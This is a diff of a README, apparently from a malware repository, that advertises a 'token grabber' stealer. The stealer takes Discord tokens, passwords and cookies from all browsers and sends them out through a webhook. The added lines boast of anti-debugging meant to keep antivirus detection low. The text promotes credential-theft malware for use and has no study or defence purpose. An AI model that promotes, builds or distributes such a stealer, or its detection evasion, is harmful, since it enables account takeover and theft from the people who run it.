Purora/Purora-Token-Grabber-v5/README.md

 # Purora-Token-Grabber
-All Browsers Password Grabber Stealer Token Grabber All in one webhook stealer Discord Token🟢
+All Browsers Password Grabber Stealer Token Grabber All in one webhook stealer

+IT HAVE REALLY DECENT ANTI DEBUG TO LOW AV DETECTIONS

+Discord Token🟢
 Browser Passwords🟢
 Browser Cookies🟢